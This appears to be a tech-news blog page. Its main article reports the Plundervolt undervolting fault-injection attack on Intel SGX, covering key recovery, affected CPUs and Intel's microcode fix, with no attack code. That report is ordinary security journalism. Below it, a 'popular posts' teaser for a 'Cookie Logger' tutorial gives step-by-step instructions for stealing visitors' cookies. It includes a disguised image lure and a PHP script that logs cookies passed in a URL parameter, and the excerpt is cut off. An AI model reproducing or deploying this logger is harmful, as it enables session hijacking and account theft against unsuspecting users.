Skip to main content

Intel SGX Hacked by Tweaking CPU Voltage by New PlunderVolt Attacks

By
Intel SGX

A team of cybersecurity researchers demonstrated a novel yet another technique to hijack Intel SGX, a hardware-isolated trusted space on modern Intel CPUs that encrypts extremely sensitive data to shield it from attackers even when a system gets compromised.

Dubbed Plundervolt and tracked as CVE-2019-11157, the attack relies on the fact that modern processors allow frequency and voltage to be adjusted when needed, which, according to researchers, can be modified in a controlled way to induce errors in the memory by flipping bits.

Bit flip is a phenomenon widely known for the Rowhammer attack wherein attackers hijack vulnerable memory cells by changing their value from 1 to a 0, or vice versa—all by tweaking the electrical charge of neighboring memory cells.

 However, since the Software Guard Extensions (SGX) enclave memory is encrypted, the Plundervolt attack leverages the same idea of flipping bits by injecting faults in the CPU before they are written to the memory.

Plundervolt resembles more with speculative execution attacks like Foreshadow and Spectre, but while Foreshadow and Spectre attack the confidentiality of SGX enclave memory by allowing attackers to read data from the secured enclave, Plundervolt attacks the integrity of SGX to achieve the same.

To achieve this, Plundervolt depends upon a second known technique called CLKSCREW, a previously documented attack vector that exploits energy management of CPU to breach hardware security mechanisms and take control over a targeted system.

"We show that a privileged adversary is able to inject faults into protected enclave computations. Crucially, since the faults happen within the processor package, i.e., before the results are committed to memory, Intel SGX's memory integrity protection fails to defend against our attacks," the researchers said.






As demonstrated by the researchers in the videos, by subtly increasing or decreasing the voltage delivered to a targeted CPU, an attacker can trigger computational faults in the encryption algorithms used by SGX enclaves, allowing attackers to easily decrypt SGX data.

"We demonstrate the effectiveness of our attacks by injecting faults into Intel's RSA-CRT and AES-NI implementations running in an SGX enclave, and we reconstruct full cryptographic keys with negligible computational efforts," the researchers said.

 "Given a pair of correct and faulty ciphertext on the same plaintext, this attack is able to recover the full 128-bit AES key with a computational complexity of only 232+256 encryptions on average. We have run this attack in practice, and it only took a couple of minutes to extract the full AES key from the enclave, including both fault injection and key computation phases."

Plundervolt attack, which affects all SGX-enabled Intel Core processors starting with the Skylake generation, was discovered and privately reported to Intel in June 2019 by a team of six European researchers from the University of Birmingham, Graz University of Technology, and KU Leuven.

In response to the researchers' findings, Intel yesterday released microcode and BIOS updates to address Plundervolt by locking voltage to the default settings, along with 13 other high and medium severity vulnerabilities.

"Intel has worked with system vendors to develop a microcode update that mitigates the issue by locking voltage to the default settings," Intel's blog post published today reads. "We are not aware of any of these issues being used in the wild, but as always, we recommend installing security updates as soon as possible."

Here's the list of CPU models affected by the Plundervolt attack:

  • Intel 6th, 7th, 8th, 9th & 10th Generation Core Processors
  • Intel Xeon Processor E3 v5 & v6
  • Intel Xeon Processor E-2100 & E-2200 Families
  • For the full list of affected products, you can head on to Intel's security advisory INTEL-SA-00289.

Besides releasing a proof-of-concept (PoC) on GitHub, the team has also released a dedicated website with FAQs and detailed technical paper [PDF] titled, Plundervolt: Software-based Fault Injection Attacks against Intel SGX, that you can check to know in-depth details on the attack.
Labels:

Comments

Post a Comment

Popular posts from this blog

10 Best Forum Software For Webmasters

By
10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h
Post a Comment
Read more

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more